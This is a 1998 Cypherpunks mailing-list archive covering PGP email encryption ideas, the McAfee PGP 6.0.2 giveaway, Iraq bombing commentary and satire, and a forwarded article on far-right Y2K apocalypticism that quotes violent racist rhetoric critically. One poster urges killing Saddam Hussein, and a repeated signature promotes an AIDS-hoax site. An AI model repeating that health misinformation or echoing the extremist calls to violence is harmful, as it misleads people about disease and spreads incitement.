>> I for one would like sendmail integrated with PGP. For example:
>> sendmail asks receiving server if it has PGP, and please give 
>> your public key, I have mail for you.. Then send the e-mail 
>> encrypted, while the receiving sendmail decrypts it and delivers
>> forwards. This is not very effective, but it would help some.

>I think this is a great idea. First time I'll play with making a POP
>client (an idea that appeals to me once in a while) I'll think about
>it...

Wouldn't it be more efficient to use TLS or SSH as an encryption protocol
between the POP3d and the POP3 client? This could also be used for
sendmail<->sendmail transactions.

This still does not address local storage on the POP3d server. I am
looking to setting up procmail to automatically PGP encrypt incomming
messages and the forwarding them to a local account so even if the sender
does not have PGP once the message is received by the PGP mail forwarder
the messages will be PGP encrypted (I have had several people contact me
looking for solutions to ISP's snooping on their mail without relying on
the senders using PGP).



- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Your brain.  Windows: Your brain on drugs.

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i OS/2 for non-commercial use
Comment: Registered_User_E-Secure_v1.1b1_ES000000
Charset: cp850

wj8DBQE2eZOrlHpjA6A1ypsRAgVDAKCpsNkbUjYCe77XBFHXnQDjZveHIwCg81zI
UQM3ssGqYt/sQ+674XepePs=
=GLQh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: richardcwaits@telescan.com
Date: Fri, 18 Dec 1998 18:45:38 +0800
To: CYPHERPUNKS@toad.com
Subject: Technical Analysis Special Offer
Message-ID: <199812181014.CAA28050@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



We've put together a technical analysis package that will help you profit not just in 1999, but into the next millenium. And with your purchase of $125 or more, you'll get your choice of one free investment book!  Just buy any of the information packed books, video tapes or CDs below with a total value of $125 or more, and choose one of the four books listed at the bottom of this message.  But you must order by December 30, 1998 to receive this special offer!  Call (800)324-8246 today to get a great package of educational materials, plus one free book!

Trading 101 and 102: The 101 book is a step-by-step guide to all the trading basics. Learn how to create a personalized trading system, backtest it, and evaluate performance. Then step up to the Trading 102 book, "Getting Down to Business," a complete guide to starting and managing your own trading business. Get both books for $68!

Market analyst John Murphy shows you how to profit with technical analysis with these two unique resources. In his book "The Visual Investor," Murphy shows you how to track the ups and downs of stock prices by visually comparing charts (includes software disk.) In his new videotape, "Applying Trading Methods to Today's Trading," Murphy shares his perspective as he reveals some of the technical indicators he uses to analyze the markets. Buy both the book and video for only $89!

Learn how to Interpret Bollinger Bands. Attend John Bollinger's exclusive one-day seminar... in the comfort of your own home! In this two-videotape set, Bollinger shows you the history and construction of trading bands, how to interpret Bollinger Bands and what indicators to use for confirmation. Also covered is %b, Money Flow, "The Squeeze," and chart analysis. John Bollinger also reviews in detail his latest industry group work, including Early Warning Signals. It even includes an in-depth workbook. Just $195!

Thomas Myers' Technical Analysis Course teaches you how to recognize market trends with his basic course, and how to use trends for profit. Just $47.50!

Martin Pring, one of the foremost technical analysts in the world, has created the perfect guide for beginning technicians. In his book Technical Analysis Explained, Pring gives you a one-on-one course on every aspect of technical analysis. And the interactive companion CD-ROM is a user-friendly way to help master the techniques. Just $89.95 for both!

Through this special year-end offer, a purchase of $125 or more entitles you one of the books below.

Cyber-Investing: Cracking Wall Street with your Personal Computer (a $26.95 value)
Wall Street City: Your Guide to Investing on the Web (a $27.95 value)
ProSearch Strategy Handbook - 1999 Edition (a $39.95 value)
Reminiscences of a Stock Operator (a $19.95 value)

Call 800-324-8246 to order. This offer ends December 30!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Fri, 18 Dec 1998 09:33:04 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: Clinton Attacks Iraq
In-Reply-To: <199812172117.WAA10224@replay.com>
Message-ID: <3679A6BD.3CED0FC8@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain



There is limited outrage being expressed by some members of the UN Security
Council over the use of UN weapons monitoring information to strike targets in
Iraq. The latest US military action in Iraq, dubbed Desert Fox, utilized
information acquired from UNSCOM weapons inspection teams to develop targeting
priorities and improve strike precision.

Specifically, positioning data from GPS receivers used by weapons inspectors at
inspection sites in Iraq provided precise targeting coordinates for US cruise
missiles. Information from UN inspectors was also used to prioritize targets
into several categories, including: High threat defensive sites such as
antiaircraft missile and radar facilities, medium threat command and
communications sites, and low threat power and manufacturing plants. GPS data
was essential for targeting high threat sites located near residential areas.

Some suggestion has been made to sequester the GPS receivers, some of which may
store a record of use in memory. A case is being made that, in the instance of
Desert Fox, the use of UN property and UN operations aided and increased the
likelihood and effectiveness of military force. Scott Ritter, former UN weapons
inspector, was interviewed on NBC's Today show on Dec. 17. Mr. Ritter said, "The
U.S. has perverted the U.N. weapons inspection process by using it as a tool to
justify military action, falsely so."

And, for those who require it ;-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 18 Dec 1998 04:08:16 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Comrade Klinton at it again
Message-ID: <199812171926.UAA00639@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Comrade Klinton just started another bombing run, curiously after it became
widely known that the impeachment hearings wouldn't be delayed until next
week. So far, every target hit has been in camera range. NBC said that the
Iranian Embassy might have been hit by a Tomahawk.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Thu, 17 Dec 1998 20:13:51 +0800
To: cypherpunks@cyberpass.net
Subject: the KKK took my baby away (in year 2000)
Message-ID: <5fa1f33f36df0ce47fa8fa6f24f46fe0@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



   Millenium Y2Kaos:
   
   Fear of Computer Bug
   Fueling Far Right
   
   
   Prepare for war. Its coming!" With those words, hard-line racist
   preacher James Wickstrom warned an August gathering of extremists in
   Pennsylvania of the end-times battle he expects in the year 2000 -- a
   battle he believes will be set off by the so-called "y2k" computer
   bug.
   
   Across the extreme-right spectrum, such fears of a societal breakdown
   sparked by computer date-change problems have set activists afire.
   While Wickstroms prophecies may be the most explosive, similar
   millennial fears are dominating the headlines of the radical press.
   The airwaves are reverberating with warnings to head for the hills and
   hunker down for possible riots and race war. The Internet is replete
   with similarly dire scenarios.
   
   When the crash comes, Wickstrom enjoined some 30 followers, "get out
   of the way for a while and then go hunting, O Israel!" Like the
   biblical figure of David, godly whites must "fill our shoes with the
   blood of our enemies and walk in them." Wickstrom lives, he said, "for
   the day I can walk down the road and see heads on the fence posts."
   
   If the race war scenario such men envision is a fantasy, the computer
   problem they believe will set it off is not. Authorities ranging from
   President Clinton to leaders of industry around the world believe that
   y2k -- which is short for "Year 2000" -- could lead to major social
   and economic snarls, even a worldwide depression.
   
   The problem originated with early computer programmers who abbreviated
   date references to two digits -- as in "98" for 1998 -- in order to
   save then-precious bytes of computer memory. At the turn of the
   century, experts say, many computers could crash or spew nonsensical
   data as they confuse "00" for 1900. While predictions vary hugely,
   many officials and experts believe there could be serious problems in
   banking, food supplies, air traffic control, nuclear and electrical
   power, defense and any number of other sectors.
   
   Many fear a recession. And there are those who forecast even worse.
   
   
   Something will happen
   
   Regardless of the actual result -- and many experts see the
   headline-making y2k story as a tempest in a teacup -- there is no
   question that a large number of extremists have pegged the year 2000
   as a critical date. For many, it will be the time when Christian
   patriots, the "children of light," must do battle with the satanic
   "forces of darkness." Others believe "one-world" conspirators will
   attack American patriots on that date.
   
   This has not been lost on those who battle right-wing terror. Early
   next year, the FBI will launch a nationwide assessment of the threat
   of domestic terrorism on and around Jan. 1, 2000. "I worry that every
   day something could happen somewhere," Robert Blitzer, head of the
   FBIs domestic terrorism unit, told the Los Angeles Times recently (see
   interview also in this issue).
   
   "The odds are that something will happen."
   
   Hard-line revolutionaries like Wickstrom are not the only ones to tie
   apocalyptic visions to the y2k problem. Pat Robertsons relatively
   mainstream Christian Broadcasting Network (CBN), for instance, offers
   news stories describing the computer bug and its possible
   ramifications such as "The Year 2000: A Date With Disaster" and
   "Countdown to Chaos: Prophecy for 2000." Robertson markets a CBN
   video, "Preparing for the Millennium: A CBN News Special Report," that
   includes a synopsis of "the y2k computer crisis" with his futuristic
   novel, The End of an Age, which describes a "possible scenario of a
   future biblical Armageddon" triggered by a meteors crash.
   
   The audience for such ideas is not even limited to evangelical
   Christians. A large number of new religious books have crossed over
   strongly into the secular market.
   
   Left Behind
   , a recent series of four apocalyptic novels co-authored by an
   evangelical Christian minister and a former journalist, has sold
   almost 3 million copies. The series made "publishing history in
   September when all four of the books ascended to the top four slots on
   Publishers Weekly magazines lists of bestsellers," according to a
   report in The New York Times. The books authors say every major
   prophecy of the biblical Book of Revelations has been fulfilled, and
   they expect the y2k bug could set off the crisis.
   
   
   Y2K and the antichrist
   
   "It could very well trigger a financial meltdown," co-author Tim
   LaHaye writes on his publishers Web site, which attracts 80,000
   electronic visits a day, "leading to an international depression,
   which would make it possible for the antichrist or his emissaries to
   establish a one-world currency or a one-world economic system, which
   will dominate the world commercially until it is destroyed."
   
   The series has spun off a companion childrens book series, a music CD,
   T-shirts and caps. More books and a movie also are in the works, the
   Times reported. And now, Tennessee trade magazine publisher Tim Wilson
   has launched a new periodical, Y2K News Magazine, that includes tips
   on defending property from would-be attackers.
   
   Reaction to the y2k problem on the extreme fringes of the right has
   varied widely, usually depending on the religious or ideological bent
   of each group. Probably the most consistent theme has been a
   survivalist one, with ideologues warning that people must prepare for
   the worst. And entrepreneurs around the country have leaped to take
   advantage of these fears, offering for sale everything from dried
   foods to underground bunkers.
   
   At the Preparedness Expo 98 held in Atlanta last June, for instance,
   at least a dozen speakers offered bleak assessments of the coming
   crisis. For those who took the bait, there was a plethora of products
   available: water purifiers, hundreds of types of storable foods from
   "enzyme-rich vegetable juice extracts" to "gourmet" dehydrated fruits,
   seeds, herbal medicines, "Cozy Cruiser" trailers and all manner of
   books on survival skills.
   
   Such merchants arent the only ones pandering to millennial fear.
   
   
   Land, gold and medical school
   
   In Idaho, so-called "Patriot" James "Bo" Gritz hawks remote lots of
   land that he describes as "an ark in the time of Noah," along with a
   huge range of survivalist products and training. In Montana, Militia
   of Montana leader John Trochmann has a catalog of holocaust-survival
   items. In states around the country, far-right "investment counselors"
   sell strategies to protect ones money as civilization collapses. And
   on the Internet, two self-described "Christian Patriots" signing
   themselves Michael Johnson and Paul Byus offer "foolproof" gold
   certificates to a mining claim in Oregon.
   
   "We [also] have set up schools to cover kindergarten, 1st thru 12th
   grades, adult school, community college, 4 yr college, university, and
   even the medical school I told you about 6 months ago," one of the
   Internet salesmen claims. "Bring your kids and entire family to
   participate in our secure decentralized Patriot community... ."
   
   Other reactions on the extreme right run the gamut, from seeing the
   crisis as an opportunity for global conspirators to seize dictatorial
   powers, to viewing it as an opening for revolution or a fulfillment of
   biblical prophecy. Recent examples:
   
   The New American, an organ of the ultraconservative John Birch
   Society, speculates that the y2k bug could be Americas Reichstag fire,
   a reference to the 1933 arson attack on Germanys Parliament building
   that was used by Hitler as an excuse to enact police state laws.
   "[C]ould the Millennium Bug provide an ambitious President with an
   opportunity to seize dictatorial powers?" the magazine asks. "Such a
   notion seems plausible... ."
   
   Norm Olson, a Michigan militia leader, is busy doing "wolfpack"
   training for the apocalypse, reports Media Bypass, a magazine popular
   among Patriots. "Survival is the key. As with most other people, we
   will rely on our self-supporting covenant community, " said Olson, who
   believes constitutional rights probably will be suspended before the
   real crisis hits. "It will be the worst time for humanity since the
   Noahic flood."
   
   In his AntiShyster magazine, Patriot editor Alfred Adask speaks of
   entire cities running out of food and of the possibility of "millions
   of American fatalities." "If the y2k information Ive seen is accurate,
   we are facing a problem of Biblical proportions," he says.
   "Potentially, y2k ... [is] a dagger pointed at the heart of Western
   Civilization."
   
   Bo Gritzs Center for Action newsletter, describing y2k as "a pandemic
   electronic virus more deadly than AIDS," predicts "worldwide chaos"
   and then goes on to offer lots for sale at Gritzs "Almost Heaven"
   community. "If Y-2-K has the predicted effect ... we can expect to
   see, out of the ashes of decimated fiat systems and economic chaos,
   the rise of a MONEY MESSIAH, who will offer a miraculous fix to a
   bleeding, begging world," Gritz adds. He also predicts imposition of a
   worldwide "electronic currency."
   
   Writing in The Jubilee, the leading periodical of the racist and
   anti-Semitic Christian Identity religion, correspondent Chris Temple
   says that "the net result of the Year 2000 problem as I have described
   it will be POSITIVE! Internationalism and capitalism will be dealt
   severe blows; efforts to recapture local control ... will spread."
   
   In his Patriot Report, Identity proselytizer George Eaton concludes:
   "We need to act as if our lives depend upon our decisions, because
   they do. What can we do? Continue to work and save up money for
   survival items. ... A person can never be over-prepared."
   
   In a July Internet posting on a Klan news page, a contributor
   described as a computer programmer demands that the federal government
   "surrender" in return for programmers assistance in fixing the y2k
   bug. The posting speaks of "the thousands (probably millions) joining
   us in our rural retreats. Weve got the bibles, the beans, the
   bandages, the bullets -- and the brains. ... You will reap what you
   have sewn [sic]. ... Some cities will indeed end in flames -- flames
   that will light a path to our posteritys freedom."
   
   
   From fallout shelters to y2k
   
   Interestingly, one of the most salient commentators on the y2k problem
   -- a man often quoted in the mainstream press -- has been Gary North.
   North is a hard-line opponent of abortion and a theocratic thinker who
   advocates imposing biblical law on the United States. In his books, he
   has written of the possibility of a "political and military"
   confrontation "in the philosophical war against political pluralism."
   Although he is widely described as a y2k "expert," he is also
   something of a professional doomsayer.
   
   In 1986, long before the y2k problem came to public attention, North
   co-authored a book on how to survive nuclear Armageddon. Called
   Fighting Chance: Ten Feet to Survival, it features a shovel -- for
   digging fallout shelters -- on its cover.
   
   Norths huge y2k Web site has made him into a guru to many extremists.
   The neo-Nazi Aryan Nations is one of many groups that link their Web
   sites to that of North.
   
   "These are people who are super-sensitive to anything that suggests
   the collapse of social institutions," Michael Barkun, a Syracuse
   University expert on millennialism, said of y2k fearmongers. "Since
   nuclear war really is no longer out there as a terribly likely way for
   civilization to end, theyve got to find something else. y2k is
   convenient."
   
   Many experts, including Barkun and the FBIs Blitzer, agree that
   extremists fears and hopes surrounding y2k have increased the danger
   of domestic terrorism. "It adds to apocalyptic fears," says Chip
   Berlet, who studies the far right for Cambridge-based Political
   Research Associates. "Therefore, it adds to the potential for
   violence."
   
   James Wickstrom may best illustrate that potential.
   
   At the meeting he co-hosted with Identity leader August Kreis in
   Ulysses, Pa., he warned his audience -- several clad in Aryan Nations
   uniforms -- that auth
   
   The enemy, said Wickstrom, must be "exterminated." He must be "shot."
   He must be "hanged." "The battle is upon us," Wickstrom bellowed.
   "Battle!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 18 Dec 1998 10:09:48 +0800
To: cypherpunks@cyberpass.net
Subject: Howdy neighbor! Can I borrow an egg, some sugar, and a SCSI cable?
Message-ID: <v04020a42b29f62cf2304@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Thu, 17 Dec 1998 16:32:14 -0500
To: 0xdeadbeef@substance.abuse.blackdown.org
Subject: Howdy neighbor! Can I borrow an egg, some sugar, and a SCSI cable?
Date: Thu, 17 Dec 1998 16:36:36 -0500
From: glen mccready <glen@qnx.com>
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org


Forwarded-by: Nev Dull <nev@bostic.com>
Forwarded-by: "Kevin D. Clark" <kclark@cabletron.com>

Source: http://online.guardian.co.uk/theweb/911396071-geekville.html

Leander Kahney inspects a des. res. for hackers

House fit for a mouse

TO RENT: apartment; sleeps 2.8 computers; unique address (on the Web);
Linux in all rooms; only geeks need apply.

This isn't quite how Walden Internet Village advertises itself but it is
how the complex sees itself: 'run by geeks for geeks'. The 12-building
complex in Houston, Texas, boasts pleasant decor and beautiful landscaped
gardens but for the tenants it is trying to attract the most important
feature will be the way it is wired for the future, offering the kind of
high-speed Internet access enjoyed only by big companies and universities.

"It's a community for hackers," says Alan LeFort, marketing director and
network administrator. "It's not easy to find a place where your
neighbours are Perl programmers or Linux freaks."

Every apartment has a 10 Megabit per second pipe to the Internet -- a
connection about 175 times faster than the standard 56k modem. It also
has assigned its own unique Web address, so residents can run their own
Web sites from inside their apartments.

"We don't care what they run as long as its not a porn site," LeFort said.

All apartments also have wiring built into the walls for their own little
home network. "The average resident has 2.8 machines," LeFort says. "They
like to connect them together." The complex also offers several big
computers on an internal network, one dedicated to the game Quake and
another for storing the GNU/Linux software favoured by most tenants. The
few running Windows NT will have to be "educated", LeFort said.

At first sight, Texas with its cowboy image, might seem an unlikely place
for a geek community. But Houston is home to Nasa's Johnson Space Center,
Compaq, and a major axis for the engineering, medical, and, of course,
the oil and energy industries. Already geeks have snapped up about half
the 200 apartments. The company hopes to fill the rest with geeks as
non-hackers' leases expire. Rents range from $675 (L409) per month for a
one-bedroom flat to $1,400 a month for a three-bedroom, two-bathroom home.
The complex boasts an active social life. Every fortnight is party night
when up to 50 people turn up with their computers and hook them into a
fast Local Area Network for playing games.

Walden is a pilot project. The company owns five other complexes in
Houston and is considering re-wiring three of them for hackers.

Visit Walden Internet Villages at http://www.waldenweb.com and two of the
complex's game sites at http://www.gamerscircle.com, http://www.quake2.com

18 November 1998

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 18 Dec 1998 04:42:20 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812171941.UAA02032@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



McAfee has announced that they are giving away the commercial version of PGP 6.0.2 for free for a limited time.  It also includes PGP Disk, which creates virtual encrypted drives.  PGP 6.0.2 also claims to have anti-TEMPEST protection, by using a special font.  My question is: what's the catch?

It is a fact that Network Associates (McAfee's owner) is a member of the Key Recovery Aliance.  Is the decision to give the software away part of something that's not being said (i.e. reduced security) or did I spend $39.99 on PGP and an additional $39.99 on PGP Disk for no reason because it would become available for free two weeks later?

And, has anyone tested the anti-TEMPEST features in PGP 6.0.2?

        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 18 Dec 1998 13:49:51 +0800
To: "Brown, R Ken" <cypherpunks@cyberpass.net
Subject: RE: I must admit. . .
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F863E@MSX11002>
Message-ID: <v0311072cb29f856574cc@[209.109.239.194]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:17 AM -0700 12/17/98, Brown, R Ken wrote:
>I'm sorry but this is nonsense. Ghandi may have been a great man and an
>inspiration to us all but he *lost*. His first big political involvment was
>trying to stop the British from allowing the Boers to take away political
>rights from the "coloured" and Asian  population of Cape Colony. The Brits
>caved into the white South Africans and we all know what happened next.
>Then he tried to get them (well us I suppose, since I'm British) to "quit
>India" in the 1920s & 30s - failed again, we got out 2 decades later, after
>WW2,  when a British government was elected that was anti-colonialist. You
>wouldn't have been able to persuade the 1945-1951 government to stay *in*
>India. In fact they were so eager to get out they probably caused more
>problems by the speed of the withdrawal.  Ghandi wanted a secular federation
>of all India - but instead there was partition, the secession of an
>inherently unviable Muslim state that was bound to end up with either civil
>war or fundamentalism (and in the end got both, at least for some of the
>time), and at least hundreds of thousands, and possibly many millions of
>deaths that could have been avoided.  And then of course he himself was
>killed.  And now India has the BJP.  Ghandi was perhaps *right* but he
>certainly didn't "win the race".

If you take the long view, Ghandi has won 2 out of 3.  South Africa is a
lot better than in Ghandi's day.  Britain is out of India.  He has so far
lost on the separation of India and Pakistan, with no unification is sight.
It is clear that Ghandi has inspired the people more directly involved with
the final victory in the first two cases.  I think Ghandi took the long
view.  YMMV.


-------------------------------------------------------------------------
Bill Frantz       | Macintosh: Didn't do every-| Periwinkle -- Consulting
(408)356-8506     | thing right, but did know  | 16345 Englewood Ave.
frantz@netcom.com | the century would end.     | Los Gatos, CA 95032, USA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jukka E Isosaari <jei@zor.hut.fi>
Date: Fri, 18 Dec 1998 05:07:59 +0800
To: "Joel O'Connor" <ogrenivek@yahoo.com>
Subject: Re: I must admit. . .
In-Reply-To: <19981216144244.7920.rocketmail@send101.yahoomail.com>
Message-ID: <Pine.LNX.3.96.981217215047.32327C-100000@zor.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 16 Dec 1998, Joel O'Connor wrote:

> Cypherpunks write code?  Make people use it. . .
> 
> 
> 
> 
> ---mib <mib@io.com> wrote:
> >
> > On Mon, Dec 14, 1998 at 12:25:50PM -0800, you wrote:
> > > I wonder sometimes whether or not there is hope for us to ever stop
> > > this tyrrany.  I've seen a bunch of us diss the strike saying it was
> > > an outlandish and foolish idea, but I hadn't seen anyone of you come
> > > up with something better.

Kill Saddam Hussein instead of thousands of normal Iraqi people. 

Everyone is touting how he is behind every nasty thing that the 
Iraq does, so just kill or capture and imprison him. Don't take
it out on all the Iraqis.

Now, how's that for an alternative?

But I doubt it will happen. 

The UK+USA need an icon, a person to embody as THE international
satanic terrorist threat to all civilized nations. Otherwise their
current military expenditures would look ridiculously high and
unnecessary, now that the Russians don't pose any threat. This is
also why terrorist horror scenarios and stories are increasingly
used to justify incredible expenditure. The military is engaged
in creating a threat to justify their existence and continued 
economic well-being. Saddam is worth much, much more to them when
he is alive and well in Iraq.

The fact, however, is that any loony Unabomber cooking some anthrax
in his cellar in the US, would be able to harm the US more than the
whole nation of Iraqis right now, or in the years to come. Welcome
to Echelon and big brother surveillance justification.

++ J





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 18 Dec 1998 05:57:10 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: RE: Clinton Attacks Iraq
Message-ID: <199812172117.WAA10224@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> -----Original Message-----
> From: Rabid Wombat [mailto:wombat@mcfeely.bsfs.org]
> Sent: Thursday, December 17, 1998 1:04 AM
> To: Anonymous
> Cc: cypherpunks@EINSTEIN.ssz.com
> Subject: RE: Clinton Attacks Iraq
>
> Was it my imagination, or did the T'Hawk strikes pause for 
> Bubba's speech?
> It seemed like they were coming into Baghdad every half hour, like
> clockwork, but they seem to have skipped one half-hour's 
> worth when Bubba
> was on the air. 

By the order of the new Joint Chief of Staff, the newly commissioned Nielsen
rating system, the bombings were halted due to most targets being pointed at
the White House for Clinton-mania by select TV viewers nationwide.  Once
Clinton was off the air the new targetting systems available at select
Nielsen homes nationwide resumed proper operation by select War@Home
families tuning to their favorite news channels covering sites in Iraq.

Unfortunately a select number of viewers took shine to the Iranian Embassy
causing a tomahawk's guidance system to be changed and resulting in the
destruction of mentioned structure.  This will, of course, be blamed on user
error at the next press hearing.

yours virtually forever (however long that may be),
WarMonger

"Wag the Dog" was just the beginning...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jukka E Isosaari <jei@zor.hut.fi>
Date: Fri, 18 Dec 1998 05:04:14 +0800
To: "Joel O'Connor" <ogrenivek@yahoo.com>
Subject: Re: I must admit. . .
In-Reply-To: <19981216144244.7920.rocketmail@send101.yahoomail.com>
Message-ID: <Pine.LNX.3.96.981217220848.32327E-100000@zor.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 16 Dec 1998, Joel O'Connor wrote:

> Cypherpunks write code?  Make people use it. . .
> 
> 
> 
> 
> ---mib <mib@io.com> wrote:
> >
> > On Mon, Dec 14, 1998 at 12:25:50PM -0800, you wrote:
> > > I wonder sometimes whether or not there is hope for us to ever stop
> > > this tyrrany.  I've seen a bunch of us diss the strike saying it was
> > > an outlandish and foolish idea, but I hadn't seen anyone of you come
> > > up with something better.
> > 
> > Cypherpunks write code?

Whoops. Wrong subject. You were talking about the strike against
the Wassenaar agreement. 

Not the Iraqis... :) Duh, duh! Too much TV. I am sorry. :)

Well, here's my idea on how to fight the Wassenaar agreement:

I think the best method to fight the WA is with education.
Educate people. Help them use PGP with their applications.

Help integrate PGP into e-mail programs, make it's use easy.

I for one would like sendmail integrated with PGP. For example:
sendmail asks receiving server if it has PGP, and please give 
your public key, I have mail for you.. Then send the e-mail 
encrypted, while the receiving sendmail decrypts it and delivers
forwards. This is not very effective, but it would help some.

Also, you could have your sendmail enforce the PGP option that
no unsecure servers or forwardings would be considered acceptable,
and the e-mail should be returned if such were encountered.

This would eliminate at least *some* of the e-mail spooks there.
I realize it is no not very good, but it is better than nothing 
at all.

++ J





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Fri, 18 Dec 1998 13:09:21 +0800
To: cypherpunks@toad.com
Subject: Re: McAfee PGP 6.0.2
In-Reply-To: <Pine.LNX.4.05.9812181007350.7783-100000@khercs.chipware.net>
Message-ID: <3.0.2.32.19981217230414.00713450@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I got it! I had to use their search engine to find it though. Took 3 
tries to get it because the ftp kept stalling. If anyone can't find 
it I will be happy to send it on as an attach. Haven't installed it 
yet though. You better hurry if you want if from me because I leavinf 
for LA for 2 weeks.

Edwin

At 06:48 PM 12/17/98 -0800, you wrote:
>Max Inux writes:
>> it goto the pgp pages (easy link -> www.pgp.com) download PGP For 
personal
>> privacy, it is under that link.
>
>I think you're going  to be disappointed if you go there;
>the pgp web page has been swallowed by nai's, & download
>leads you to the new McAfee store, which is surely a nominee
>for "web pages that suck"(tm).  No free downloads.  There may 
>be something under one of the evaluation pages, but frankly
>the whole site turned me off & I didn't care to look so.  It's hard
>to find any mention of pgp at all, actually.
>
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNnnUPkmNf6b56PAtEQL/JACfdAlksad2RLnZ6vvZluGtpJaEut8An3JB
rLZG8tG/GOCEWhRmhE6w7K5P
=jjvZ
-----END PGP SIGNATURE-----


When freedom is outlawed.......Only outlaws will be free!

If cryptography is outlawed, pomz pvumbxt xjmm ibwf dszquphsbqiz.

Fun! Fast! Revealing! Try "The World's Smallest Political Quiz" at:
   http://www.self-gov.org/quiz.html

IS AIDS A GOVERNMENT/DRUG COMPANY HOAX?
   http://www.virusmyth.com/aids/index.htm

When you blame others, you give up your power to change.
Dr. Robert Anthony

Libertarian Party of Hillsborough County, FL
   http://home.tampabay.rr.com/lphc

When a place gets crowded enough to require ID's, social collapse is not far
away. It is time to go elsewhere. The best thing about space travel is that
it made it possible to go elsewhere.

Lazarus Long




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Fri, 18 Dec 1998 14:15:42 +0800
To: Jim Gillogly <cypherpunks@toad.com
Subject: Re: McAfee PGP 6.0.2
In-Reply-To: <3679DC1E.F2D0E10E@acm.org>
Message-ID: <3.0.2.32.19981218002853.0071a270@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Duh! You're so right. here's the URL

http://www.nai.com/products/security/pgp_perspriv602.asp

In Liberty

Edwin


At 08:37 PM 12/17/98 -0800, you wrote:
>> I got it! I had to use their search engine to find it though. Took 
3 
>> tries to get it because the ftp kept stalling. If anyone can't 
find 
>> it I will be happy to send it on as an attach.
>
>It might help if you posted either the URL or the terms you fed 
their
>search engine to locate it.
>
>-- 
>	Jim Gillogly
>	Trewesday, 28 Foreyule S.R. 1998, 04:36
>	12.19.5.14.0, 6 Ahau 13 Mac, First Lord of Night
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNnnoFEmNf6b56PAtEQIe1wCggnyZc8La+KNjL1e2qSK7dbt/kQgAn3o8
GkjttjZC9VldQ7jFCueSm6Ex
=PAxS
-----END PGP SIGNATURE-----


When freedom is outlawed.......Only outlaws will be free!

If cryptography is outlawed, pomz pvumbxt xjmm ibwf dszquphsbqiz.

Fun! Fast! Revealing! Try "The World's Smallest Political Quiz" at:
   http://www.self-gov.org/quiz.html

IS AIDS A GOVERNMENT/DRUG COMPANY HOAX?
   http://www.virusmyth.com/aids/index.htm

When you blame others, you give up your power to change.
Dr. Robert Anthony

Libertarian Party of Hillsborough County, FL
   http://home.tampabay.rr.com/lphc

When a place gets crowded enough to require ID's, social collapse is not far
away. It is time to go elsewhere. The best thing about space travel is that
it made it possible to go elsewhere.

Lazarus Long




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Fri, 18 Dec 1998 09:21:35 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: "They've started bombing Mars! I repeat, they're bombing Mars!"
Message-ID: <19981218004409.16492.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



"We just intercepted a coded transmission from Earth Force Command. They've
started bombing Mars! I repeat, they're bombing Mars!"

(scene of two fighters on approach to a biodome)

Omega One: "Standing by. Weapons hot."
Radio: "Don't do it! We have women and children down here! Don't do it!"
